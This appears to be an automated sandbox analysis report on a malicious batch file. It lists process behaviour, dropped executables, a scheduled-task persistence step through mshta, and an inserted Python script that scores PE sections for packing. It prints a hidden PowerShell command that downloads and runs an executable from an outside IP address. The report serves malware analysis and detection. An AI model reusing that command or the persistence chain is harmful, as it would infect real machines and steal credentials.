Source: D51OAO8D0TVNMCQXHC.exe.30.dr | Static PE information: section name: .idata
Source: D51OAO8D0TVNMCQXHC.exe.30.dr | Static PE information: section name: (non-printable)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exe | Code function: 29_2_0000017637AB2C94 NtFreeVirtualMemory
Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exe | Code function: 29_2_0000017637AB2B78 NtAllocateVirtualMemory
Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exe | Code function: 29_2_0000017637C1C220 NtQueryInformationProcess
Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exe | Code function: 29_2_0000017637C1C040 VirtualAlloc,NtCreateThreadEx,VirtualFree
Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exe | Code function: 29_2_0000017637C1C800 NtQuerySystemInformation,NtQuerySystemInformation
Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exe | Code function: 29_2_0000017637C1C570 NtWriteVirtualMemory
Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exe | Code function: 29_2_0000017637C1C440 NtAllocateVirtualMemory
Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exe | Code function: 29_2_0000017637C1C360 NtQueryInformationProcess
Source: C:\Windows\System32\spoolsv.exe | Code function: 31_2_015A1C94 NtFreeVirtualMemory
Source: C:\Windows\System32\spoolsv.exe | Code function: 31_2_015A1B78 NtAllocateVirtualMemory
Source: C:\Windows\System32\spoolsv.exe | Code function: 31_2_0180C800 NtQuerySystemInformation,NtQuerySystemInformation
Source: C:\Windows\System32\spoolsv.exe | Code function: 31_2_0180C040 VirtualAlloc,NtCreateThreadEx,NtClose,VirtualFree
Source: C:\Windows\System32\spoolsv.exe | Code function: 31_2_017F4B0C VirtualAlloc,NtReadVirtualMemory,VirtualFree
Source: C:\Windows\System32\spoolsv.exe | Code function: 31_2_0180C360 NtQueryInformationProcess
Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exe | Code function: 29_2_00007FF7C9CA22D0: GetTickCount64,SetLastError,DeviceIoControl,IsDebuggerPresent
Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exe | Code function: 34_2_00961201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exe | Code function: 34_2_0096E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | File created: C:\Windows\Tasks\rapes.job
Source: C:\Windows\System32\svchost.exe | File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 12_2_00007FF9365E3CF2
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Code function: 28_2_004361F0
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Code function: 28_2_0043B700
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Code function: 28_2_00474047
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Code function: 28_2_004718D7
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Code function: 28_2_004351A0
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Code function: 28_2_0043CC40
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Code function: 28_2_00435450
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Code function: 28_2_00462C20
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Code function: 28_2_0045B4C0
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Code function: 28_2_00475CD4
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Code function: 28_2_00475DF4
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Code function: 28_2_0045F6DB
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Code function: 28_2_00434EF0
Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exe | Code function: 29_2_00007FF7C9CA1EB0
Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exe | Code function: 29_2_00007FF7C9CA22D0
Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exe | Code function: 29_2_00007FF7C9CA5270
Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exe | Code function: 29_2_00007FF7C9CA1630
Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exe | Code function: 29_2_00007FF7C9CA31E0
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exeCode function: 29_2_00007FF7C9CA2A0029_2_00007FF7C9CA2A00
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exeCode function: 29_2_00007FF7C9CA260029_2_00007FF7C9CA2600
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exeCode function: 29_2_00007FF7C9CA560029_2_00007FF7C9CA5600
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exeCode function: 29_2_00007FF7C9CA3BC029_2_00007FF7C9CA3BC0
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exeCode function: 29_2_00007FF7C9CA99E829_2_00007FF7C9CA99E8
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exeCode function: 29_2_00007FF7C9CA85D029_2_00007FF7C9CA85D0
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exeCode function: 29_2_00007FF7C9CB006829_2_00007FF7C9CB0068
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exeCode function: 29_2_00007FF7C9CAE05829_2_00007FF7C9CAE058
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exeCode function: 29_2_00007FF7C9CA9BF429_2_00007FF7C9CA9BF4
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exeCode function: 29_2_00007FF7C9CA100029_2_00007FF7C9CA1000
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exeCode function: 29_2_0000017637C028E029_2_0000017637C028E0
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exeCode function: 29_2_0000017637C0DA9029_2_0000017637C0DA90
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exeCode function: 29_2_0000017637C021D029_2_0000017637C021D0
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exeCode function: 29_2_0000017637C111B029_2_0000017637C111B0
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exeCode function: 29_2_0000017637C2C84029_2_0000017637C2C840
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exeCode function: 29_2_0000017637C177C029_2_0000017637C177C0
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exeCode function: 29_2_0000017637C3679829_2_0000017637C36798
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exeCode function: 29_2_0000017637C0DE8029_2_0000017637C0DE80
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exeCode function: 29_2_0000017637C32E8829_2_0000017637C32E88
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exeCode function: 29_2_0000017637C0D6B029_2_0000017637C0D6B0
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exeCode function: 29_2_0000017637C3FE5429_2_0000017637C3FE54
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exeCode function: 29_2_0000017637C32C0C29_2_0000017637C32C0C
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exeCode function: 29_2_0000017637C0E41029_2_0000017637C0E410
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exeCode function: 29_2_0000017637C0EC2029_2_0000017637C0EC20
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exeCode function: 29_2_0000017637C112C029_2_0000017637C112C0
                      Source: C:\Windows\System32\spoolsv.exeCode function: 31_2_017F21D031_2_017F21D0
                      Source: C:\Windows\System32\spoolsv.exeCode function: 31_2_0181C85E31_2_0181C85E
                      Source: C:\Windows\System32\spoolsv.exeCode function: 31_2_017FDA9031_2_017FDA90
                      Source: C:\Windows\System32\spoolsv.exeCode function: 31_2_017FEC2031_2_017FEC20
                      Source: C:\Windows\System32\spoolsv.exeCode function: 31_2_017FE41031_2_017FE410
                      Source: C:\Windows\System32\spoolsv.exeCode function: 31_2_01822C0C31_2_01822C0C
                      Source: C:\Windows\System32\spoolsv.exeCode function: 31_2_0182679831_2_01826798
                      Source: C:\Windows\System32\spoolsv.exeCode function: 31_2_018077C031_2_018077C0
                      Source: C:\Windows\System32\spoolsv.exeCode function: 31_2_01822E8831_2_01822E88
                      Source: C:\Windows\System32\spoolsv.exeCode function: 31_2_017FD6B031_2_017FD6B0
                      Source: C:\Windows\System32\spoolsv.exeCode function: 31_2_017FDE8031_2_017FDE80
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_0097204634_2_00972046
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_0090806034_2_00908060
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_0096829834_2_00968298
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_0093E4FF34_2_0093E4FF
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_0093676B34_2_0093676B
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_0099487334_2_00994873
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_0092CAA034_2_0092CAA0
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_0090CAF034_2_0090CAF0
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_0091CC3934_2_0091CC39
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_00936DD934_2_00936DD9
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_009091C034_2_009091C0
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_0091B11934_2_0091B119
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_0092139434_2_00921394
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_0092170634_2_00921706
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_0092781B34_2_0092781B
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_009219B034_2_009219B0
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_0090792034_2_00907920
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_0091997D34_2_0091997D
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_00927A4A34_2_00927A4A
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_00927CA734_2_00927CA7
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_00921C7734_2_00921C77
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_00939EEE34_2_00939EEE
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_0098BE4434_2_0098BE44
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_00921F3234_2_00921F32
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\random[1].exe 13F0C9496830B18ABC8851E31DD47A06A1FA6A192B2D1108ABFCE077292CEEC9
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[1].exe 54026C140022D26B76E4116CE5502F722947E564871C31B9646714611AA6387F
Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exe | Code function: String function: 00920A30 appears 46 times
Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exe | Code function: String function: 0091F9F2 appears 40 times
Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: 483d2fa8a0d53818306efeb32d3.exe.12.dr | Static PE information: Section: ZLIB complexity 0.9988969955234159
Source: 483d2fa8a0d53818306efeb32d3.exe.12.dr | Static PE information: Section: rrnnqshc ZLIB complexity 0.9943995996707573
Source: rapes.exe.17.dr | Static PE information: Section: ZLIB complexity 0.9988969955234159
Source: rapes.exe.17.dr | Static PE information: Section: rrnnqshc ZLIB complexity 0.9943995996707573
Source: random[1].exe0.28.dr | Static PE information: Section: zwvttbmt ZLIB complexity 0.994723938808185
Source: bb5ad48269.exe.28.dr | Static PE information: Section: zwvttbmt ZLIB complexity 0.994723938808185
Source: random[2].exe0.28.dr | Static PE information: Section: ZLIB complexity 0.9988962950138505
Source: 60eb3ded99.exe.28.dr | Static PE information: Section: ZLIB complexity 0.9988962950138505
Source: D51OAO8D0TVNMCQXHC.exe.30.dr | Static PE information: Section: ZLIB complexity 0.9977778495179064
Source: D51OAO8D0TVNMCQXHC.exe.30.dr | Static PE information: Section: boxephyl ZLIB complexity 0.9941974155050959
Source: 483d2fa8a0d53818306efeb32d3.exe.12.dr | Static PE information: Entrypoint disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5; instr diversity: 0.5
Source: rapes.exe.17.dr | Static PE information: Entrypoint disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5; instr diversity: 0.5
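The "ZLIB complexity" rows above are a packing heuristic: a section that zlib can only shrink to about 0.99 of its raw size is already compressed or encrypted, which is what a packer's payload looks like, and the sections scoring that high here are the same ones with blank or random names (rrnnqshc, zwvttbmt, boxephyl). The following is an added example, not Joe Sandbox's own code, that reproduces the measurement with the Python standard library only. The 0.99 cut-off is an assumption taken from the values in this report, and the minimal PE it scores is constructed inside the block so it runs offline.

```python
"""Reproduce the 'Section ZLIB complexity' static indicator.

Added example, not Joe Sandbox's code. Compressed size over raw size is
computed per PE section by walking the section table by hand. The
PACKED_THRESHOLD of 0.99 is an assumption (Joe's exact cut-off is not
published); build_test_pe() only exists to give the parser a constructed
file to run on.
"""
import random
import struct
import zlib

SECTION_HEADER_SIZE = 40
PACKED_THRESHOLD = 0.99  # assumption, see module docstring


def zlib_complexity(data: bytes) -> float:
    """Compressed size over raw size, capped at 1.0 (zlib adds framing bytes
    to incompressible input, which would otherwise push the ratio above 1)."""
    if not data:
        return 0.0
    return min(1.0, len(zlib.compress(data, 9)) / len(data))


def pe_sections(pe: bytes):
    """Yield (name, raw bytes) for every section in a PE image."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew, = struct.unpack_from("<I", pe, 0x3C)
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    n_sections, = struct.unpack_from("<H", pe, coff + 2)   # NumberOfSections
    opt_size, = struct.unpack_from("<H", pe, coff + 16)    # SizeOfOptionalHeader
    table = coff + 20 + opt_size                           # first IMAGE_SECTION_HEADER
    for i in range(n_sections):
        off = table + i * SECTION_HEADER_SIZE
        name = pe[off:off + 8].rstrip(b"\0").decode("latin-1")
        # SizeOfRawData, PointerToRawData sit at +16 and +20 in the header
        raw_size, raw_ptr = struct.unpack_from("<II", pe, off + 16)
        yield name, pe[raw_ptr:raw_ptr + raw_size]


def score_sections(pe: bytes) -> dict:
    """Map section name -> (complexity rounded to 4 places, looks_packed)."""
    scores = {}
    for name, data in pe_sections(pe):
        c = zlib_complexity(data)
        scores[name] = (round(c, 4), c >= PACKED_THRESHOLD)
    return scores


def build_test_pe(sections) -> bytes:
    """Constructed input: a PE32+ skeleton with a zeroed optional header and
    the given (name, payload) sections. Not loadable, but the header layout
    is the real one, so pe_sections() parses it like any other file."""
    e_lfanew, opt_size = 0x40, 0xF0
    dos = bytearray(e_lfanew)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x8664, len(sections), 0, 0, 0, opt_size, 0x22)
    headers, payload = bytearray(), bytearray()
    ptr = e_lfanew + 4 + 20 + opt_size + SECTION_HEADER_SIZE * len(sections)
    for name, data in sections:
        headers += struct.pack("<8sIIIIIIHHI", name.encode()[:8].ljust(8, b"\0"),
                               len(data), 0x1000, len(data), ptr, 0, 0, 0, 0, 0x60000020)
        payload += data
        ptr += len(data)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt_size) + headers + payload


def demo() -> dict:
    """Score a constructed file: a compressible '.text' next to an
    incompressible section named like the one in this report."""
    rnd = random.Random(1632121)
    incompressible = bytes(rnd.getrandbits(8) for _ in range(8192))
    pe = build_test_pe([(".text", bytes(range(256)) * 16), ("rrnnqshc", incompressible)])
    return score_sections(pe)


if __name__ == "__main__":
    for name, (c, packed) in demo().items():
        print(f"{name:<8} ZLIB complexity {c:.4f}{'  <- likely packed' if packed else ''}")
```

On a real dropped file, pass `open(path, "rb").read()` to `score_sections()`; a section at or above the threshold is the one to unpack or dump from memory, which is also why the report's process-level findings for rapes.exe come from the running process rather than from the file on disk.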
Source: classification engine | Classification label: mal100.phis.troj.spyw.evad.winBAT@108/57@64/8
Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exe | Code function: 34_2_009737B5 GetLastError,FormatMessageW
Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exe | Code function: 29_2_0000017637C03A7C GetTokenInformation,GetTokenInformation,AdjustTokenPrivileges
Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exe | Code function: 29_2_0000017637C19000 AdjustTokenPrivileges
Source: C:\Windows\System32\spoolsv.exe | Code function: 31_2_017F3A7C GetTokenInformation,GetTokenInformation,AdjustTokenPrivileges
Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exe | Code function: 34_2_009610BF AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exe | Code function: 34_2_009616C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exe | Code function: 34_2_009751CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exe | Code function: 29_2_0000017637C03FD4 CreateToolhelp32Snapshot,Process32FirstW,CloseHandle
Source: C:\Windows\System32\spoolsv.exe | Code function: 31_2_0181C85E CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,CoUninitialize
Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exe | Code function: 29_2_00007FF7C9CA3BC0 GetLastError,SetLastError,SetLastError,SetLastError,SetLastError,SwitchToThread,SetLastError,GetCommandLineW,AreFileApisANSI,lstrlenA,StrStrA,SHTestTokenMembership,GetModuleHandleExW,FindResourceW,LoadResource,LockResource,SizeofResource,GlobalAlloc,VirtualAlloc,SleepEx,ExitProcess
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\2qv26zF[1].exe
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3816:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\10128570101\ab5415a7b5.exe | Mutant created: NULL
Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\C831DBB2DBB2C831157BF6047F15F806
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5968:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6928:120:WilError_03
Source: C:\Windows\System32\spoolsv.exe | Mutant created: \BaseNamedObjects\Global\C831D4C7D4C7C8311A0EF6040A1AF806
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7088:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5124:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4700:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2892:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5484:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5252:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\System32\spoolsv.exe | Mutant created: \BaseNamedObjects\Global\mA5875B175B19A58BB789F567CBB9154
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4960:120:WilError_03
Source: C:\Windows\System32\cmd.exe | File created: C:\Temp\mtzRdqIHD.hta
Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\am_no.bat" "
Source: C:\Windows\SysWOW64\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\mshta.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\timeout.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: 19be97887a.exe, 0000001E.00000003.1725567156.00000000058B7000.00000004.00000800.00020000.00000000.sdmp, 19be97887a.exe, 0000001E.00000003.1755026979.00000000058B3000.00000004.00000800.00020000.00000000.sdmp, 19be97887a.exe, 0000001E.00000003.1726156262.0000000005896000.00000004.00000800.00020000.00000000.sdmp, 19be97887a.exe, 0000001E.00000003.1755198076.00000000058A6000.00000004.00000800.00020000.00000000.sdmp, 19be97887a.exe, 00000023.00000003.1872399715.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, 19be97887a.exe, 00000023.00000003.1871373132.00000000057B6000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: am_no.bat | Virustotal: Detection: 23%
Source: am_no.bat | ReversingLabs: Detection: 13%
Source: 483d2fa8a0d53818306efeb32d3.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: 483d2fa8a0d53818306efeb32d3.exe | String found in binary or memory: " /add
Source: 483d2fa8a0d53818306efeb32d3.exe | String found in binary or memory: " /add /y
Source: 483d2fa8a0d53818306efeb32d3.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: 483d2fa8a0d53818306efeb32d3.exe | String found in binary or memory: " /add
Source: 483d2fa8a0d53818306efeb32d3.exe | String found in binary or memory: " /add /y
Source: rapes.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: rapes.exe | String found in binary or memory: " /add /y
Source: rapes.exe | String found in binary or memory: " /add
Source: rapes.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: rapes.exe | String found in binary or memory: " /add /y
Source: rapes.exe | String found in binary or memory: " /add
Source: rapes.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: rapes.exe | String found in binary or memory: " /add /y
Source: rapes.exe | String found in binary or memory: " /add
Source: bb5ad48269.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\am_no.bat" "
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\timeout.exe timeout /t 2
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn "j5aLnmalkX9" /tr "mshta \"C:\Temp\mtzRdqIHD.hta\"" /sc minute /mo 25 /ru "user" /f
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\mshta.exe mshta "C:\Temp\mtzRdqIHD.hta"
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\mshta.exe C:\Windows\system32\mshta.EXE "C:\Temp\mtzRdqIHD.hta"
